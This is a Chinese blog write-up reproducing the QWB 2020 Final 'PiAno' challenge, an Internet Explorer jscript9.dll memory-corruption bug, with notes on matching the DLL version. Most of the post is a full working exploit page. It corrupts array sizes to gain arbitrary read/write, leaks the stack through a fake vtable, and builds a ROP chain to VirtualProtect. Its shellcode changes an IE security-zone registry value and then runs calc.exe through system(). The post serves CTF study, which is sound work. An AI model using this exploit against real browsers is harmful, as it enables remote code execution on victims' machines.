强网杯2020_RealWorld_PiAno复现

强网杯2020 Final的RealWorld题,PiAno复现

还是参考ha1vk师傅发在安全客上的文章复现成功的:https://www.anquanke.com/post/id/222678

我主要记录下踩坑的地方

踩坑

题目文档说改动了jscript9.dll,为了下载和题目相同版本的dll,几经波折:

  • 下载并安装一个windows10虚拟机
  • 手动下载补丁更新到2004版本,在把更新给卸载掉,让它回退到比题目环境还低的版本,一个下载网站例子:https://www.ithome.com/0/489/677.htm
  • 接着直接google题目环境里dll的版本号,找到相对应的补丁号,直接下在手动进行更新

比如本题目的dll版本是11.0.19041.508

google搜索到后是KB4571756 - 11.0.19041.508,直接去下载就行:https://www.windowslatest.com/2020/09/08/windows-10-kb4571756/

exp

在执行命令(弹计算器前),要把IE的保护模式给关了,把software\microsoft\windows\currentversion\internet settings\zones\3里的2500zone给改成3,也就是禁止,详细解释见:

https://docs.microsoft.com/en-us/troubleshoot/browsers/ie-security-zones-registry-entries

就是ha1vk师傅文章中的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
<!DOCTYPE html>
<html>
  <body>
    <script>
		var vuln = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20];
		//修改自身的size,实现任意地址读写
		vuln[0x3ffffffe] = -1;
		vuln[0x3ffffffd] = -1;
		vuln[0x3ffffff6] = -1;
		var vtable_addr = vuln[0x3ffffff2];
		var jscript9_base = vtable_addr - 0x37e8;
		var LoadLibraryExA_ptr = jscript9_base + 0x37600C;
		var GetProcAddress_ptr = jscript9_base + 0x3761A8;
		var VirtualProtect_ptr = jscript9_base + 0x376110;
		var RtlCaptureContext_ptr = jscript9_base + 0x376488;
		// mov esp, ebx; pop ebx; retn 20h
		// add esp, 14; ret
		var pop_esp = jscript9_base + 0x774ff;
		var mov_esp_ebx = jscript9_base + 0x23721a;
		var add_esp = jscript9_base + 0x270d5c;
		var base = vuln[0x3ffffff8] + 0x10;	 // elements addr
		function arb_read(addr) {
			var offset = addr - base;
			if (offset < 0) {
				offset = (0x100000000 + offset) / 4;
			} else {
				offset = offset / 4;
			}
			return vuln[offset];
		}
		function packInt(value) {
			if (value > 0x80000000) {
				value = value - 0x100000000;
			}
			return value;
		}
		//alert("elements at " + base.toString(16));
		var LoadLibraryExA_addr = arb_read(LoadLibraryExA_ptr);
		var GetProcAddress_addr = arb_read(GetProcAddress_ptr);
		var VirtualProtect_addr = arb_read(VirtualProtect_ptr);
		var RtlCaptureContext_addr = arb_read(RtlCaptureContext_ptr);
		//伪造该对象的虚表,从而leak出寄存器地址
		var leak = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20];
		leak[0x3ffffffe] = -1;
		leak[0x3ffffffd] = -1;
		leak[0x3ffffff6] = -1;
		var fake_vtable_addr = leak[0x3ffffff8] + 0x10;
		leak[31] = packInt(RtlCaptureContext_addr); //伪造hasItem函数指针
		//修改leak的虚表指针
		leak[0x3ffffff2] = fake_vtable_addr;
		//alert("debug");
		//调用hasItem,结果存放于base地址处
		var x = (base in leak);
		var stack_addr = arb_read(base + 0xB4);
		//劫持JavascriptArray::EntryPush函数的返回地址
		var rop_addr = stack_addr - 0x190;
		
		vuln[0] = 0x54464F53;
		vuln[1] = 0x45524157;
		vuln[2] = 0x63694D5C;
		vuln[3] = 0x6F736F72;
		vuln[4] = 0x575C7466;
		vuln[5] = 0x6F646E69;
		vuln[6] = 0x435C7377;
		vuln[7] = 0x65727275;
		vuln[8] = 0x6556746E;
		vuln[9] = 0x6F697372;
		vuln[10] = 0x6E495C6E;
		vuln[11] = 0x6E726574;
		vuln[12] = 0x53207465;
		vuln[13] = 0x69747465;
		vuln[14] = 0x5C73676E;
		vuln[15] = 0x656E6F5A;
		vuln[16] = 0x335C73;
		/*ADVAPI32.dll字符串*/
		vuln[17] = 0x41564441;
		vuln[18] = 0x32334950;
		vuln[19] = 0x6C6C642E;
		vuln[20] = 0;
	
		var buff = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20];
		/*ucrtbase.dll字符串*/
		buff[0] = 0x74726375;
		buff[1] = 0x65736162;
		buff[2] = 0x6C6C642E;
		buff[3] = 0;
		/*RegOpenKeyExA字符串*/
		buff[4] = 0x4F676552;
		buff[5] = 0x4B6E6570;
		buff[6] = 0x78457965;
		buff[7] = 0x41;
		/*RegSetValueExA字符串*/
		buff[8] = 0x53676552;
		buff[9] = 0x61567465;
		buff[10] = 0x4565756C;
		buff[11] = 0x4178;
		/*RegCloseKey字符串*/
		buff[12] = 0x43676552;
		buff[13] = 0x65736F6C;
		buff[14] = 0x79654B;
		/*system字符串*/
		buff[15] = 0x74737973;
		buff[16] = 0x6D65;
	
		/*calc.exe字符串*/
		buff[17] = 0x636C6163;
		buff[18] = 0x6578652E;
		buff[19] = 0;
	
	
		buff[0x3ffffffe] = -1;
		buff[0x3ffffffd] = -1;
		buff[0x3ffffff6] = -1;
		
		var strs_base = buff[0x3ffffff8] + 0x10;

		//修改vuln的index,然后利用push可以一次性写入多个值
		vuln[0x3ffffff6] = (rop_addr - base) / 4;
		vuln[0x3ffffffd] = (rop_addr - base) / 4;
		alert("rop_addr="+rop_addr.toString("16"));
		//VirtualProtect(
		//LPVOID lpAddress, // 目标地址起始位置
		//DWORD dwSize, // 大小
		//DWORD flNewProtect, // 请求的保护方式
		//PDWORD lpflOldProtect // 保存老的保护方式
		//);
		vuln.push(packInt(VirtualProtect_addr),
		packInt(rop_addr+0x18),
		packInt(rop_addr+0x18),
		0x300,
		0x40,
		packInt(rop_addr),
                  
		// 55              push    ebp
		// 89e5            mov     ebp,esp
		// 81ec00010000    sub     esp,100h
		// c745fc03000000  mov     dword ptr [ebp-4],3
		// c78550ffffff32353030 mov dword ptr [ebp-0B0h],30303532h
		// c78554ffffff00000000 mov dword ptr [ebp-0ACh],0
		// 6800080000      push    800h
		// 6a00            push    0
		// 687c009c0b      push    0B9C007Ch
		// 90              nop
		// 90              nop
		// c7854cffffff80150476 mov dword ptr [ebp-0B4h],offset KERNEL32!LoadLibraryExAStub (76041580)
		// ff954cffffff    call    dword ptr [ebp-0B4h]
		// 898548ffffff    mov     dword ptr [ebp-0B8h],eax
		// 90              nop
		// 90              nop
		// 90              nop


		packInt(0x81e58955),
		0x100ec,
		packInt(0xfc45c700),
		0x3,
		packInt(0xff5085c7),
		0x3532ffff,
		packInt(0x85c73030),
		packInt(0xffffff54),
		0x0,
		0x80068,
		0x68006a00,
		packInt(base+0x44),
		packInt(0x85c79090),
		packInt(0xffffff4c),
		packInt(LoadLibraryExA_addr),
		packInt(0xff4c95ff),
		packInt(0x8589ffff),
		packInt(0xffffff48),
                  
		// 05edc587 6888019c0b      push    0B9C0188h
		// 05edc58c 50              push    eax
		// 05edc58d 90              nop
		// 05edc58e c78544ffffff80445f6b mov dword ptr [ebp-0BCh],offset IEShims!NS_GetProcAddressShim::APIHook_GetProcAddress (6b5f4480)
		// 05edc598 ff9544ffffff    call    dword ptr [ebp-0BCh]
		// 05edc59e 898540ffffff    mov     dword ptr [ebp-0C0h],eax
		// 05edc5a4 90              nop
		// 05edc5a5 90              nop
		// 05edc5a6 90              nop
		// 05edc5a7 6898019c0b      push    0B9C0198h
		// 05edc5ac ffb548ffffff    push    dword ptr [ebp-0B8h]
		// 05edc5b2 ff9544ffffff    call    dword ptr [ebp-0BCh] ss:002b:05edc47c={IEShims!NS_GetProcAddressShim::APIHook_GetProcAddress (6b5f4480)}
		// 05edc5b8 89853cffffff    mov     dword ptr [ebp-0C4h],eax
		// 05edc5be 90              nop
		// 05edc5bf 68a8019c0b      push    0B9C01A8h
		// 05edc5c4 ffb548ffffff    push    dword ptr [ebp-0B8h]
		// 05edc5ca ff9544ffffff    call    dword ptr [ebp-0BCh] ss:002b:05edc47c={IEShims!NS_GetProcAddressShim::APIHook_GetProcAddress (6b5f4480)}
		// 05edc5d0 898538ffffff    mov     dword ptr [ebp-0C8h],eax
		// 05edc5d6 8d8534ffffff    lea     eax,[ebp-0CCh]
		// 05edc5dc 50              push    eax
		// 05edc5dd 6806000200      push    20006h
		// 05edc5e2 6a00            push    0
		// 05edc5e4 90              nop
		// 05edc5e5 90              nop
		// 05edc5e6 90              nop
		// 05edc5e7 6838009c0b      push    0B9C0038h
		// 05edc5ec 6801000080      push    80000001h
		// 05edc5f1 ff9540ffffff    call    dword ptr [ebp-0C0h] ss:002b:05edc478={ADVAPI32!RegOpenKeyExAStub (776fe100)}
		// 05edc5f7 6a04            push    4
		// 05edc5f9 8d45fc          lea     eax,[ebp-4]
		// 05edc5fc 50              push    eax
		// 05edc5fd 6a04            push    4
		// 05edc5ff 6a00            push    0
		// 05edc601 8d8550ffffff    lea     eax,[ebp-0B0h]
		// 05edc607 50              push    eax
		// 05edc608 ffb534ffffff    push    dword ptr [ebp-0CCh]
		// 05edc60e ff953cffffff    call    dword ptr [ebp-0C4h] ss:002b:05edc474={ADVAPI32!RegSetValueExAStub (776ff300)}
		// 05edc614 ffb534ffffff    push    dword ptr [ebp-0CCh]
		// 05edc61a ff9538ffffff    call    dword ptr [ebp-0C8h] ss:002b:05edc470={ADVAPI32!RegCloseKeyStub (776fe010)}
		// 05edc620 6800080000      push    800h
		// 05edc625 6a00            push    0
		// 05edc627 6878019c0b      push    0B9C0178h
		// 05edc62c ff954cffffff    call    dword ptr [ebp-0B4h] ss:002b:05edc484={KERNEL32!LoadLibraryExAStub (76041580)}
		// 05edc632 90              nop
		// 05edc633 68b4019c0b      push    0B9C01B4h
		// 05edc633 68b4019c0b      push    0B9C01B4h
		// 05edc638 50              push    eax
		// 05edc639 ff9544ffffff    call    dword ptr [ebp-0BCh] ss:002b:05edc47c={IEShims!NS_GetProcAddressShim::APIHook_GetProcAddress (6b5f4480)}
		// 05edc63f 68bc019c0b      push    0B9C01BCh
		// 05edc644 ffd0            call    eax

		0x68909090,
		packInt(strs_base+0x10),
		packInt(0x85c79050),
		packInt(0xffffff44),
		packInt(GetProcAddress_addr),
		packInt(0xff4495ff),
		packInt(0x8589ffff),
		packInt(0xffffff40),
		0x68909090,
		packInt(strs_base+0x20),
		packInt(0xff48b5ff),
		packInt(0x95ffffff),
		packInt(0xffffff44),
		packInt(0xff3c8589),
		0x6890ffff,
		packInt(strs_base+0x30),
		packInt(0xff48b5ff),
		packInt(0x95ffffff),
		packInt(0xffffff44),
		packInt(0xff388589),
		packInt(0x858dffff),
		packInt(0xffffff34),
		0x66850,
		0x6a0002,
		0x68909090,
		packInt(base),
		0x168,
		0x4095ff80,
		0x6affffff,
		packInt(0xfc458d04),
		0x6a046a50,
		0x50858d00,
		0x50ffffff,
		packInt(0xff34b5ff),
		packInt(0x95ffffff),
		packInt(0xffffff3c),
		packInt(0xff34b5ff),
		packInt(0x95ffffff),
		packInt(0xffffff38),
		0x80068,
		0x68006a00,
		packInt(strs_base),
		packInt(0xff4c95ff),
		0x6890ffff,
		packInt(strs_base+0x3C),
		0x4495ff50,
		0x68ffffff,
		packInt(strs_base+0x44),
		0xD0FF);
    </script>
  </body>
</html>

参考链接

强网杯2020决赛RealWord的IE浏览器漏洞挖掘-PiAno(PA) https://www.anquanke.com/post/id/222678

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

beginner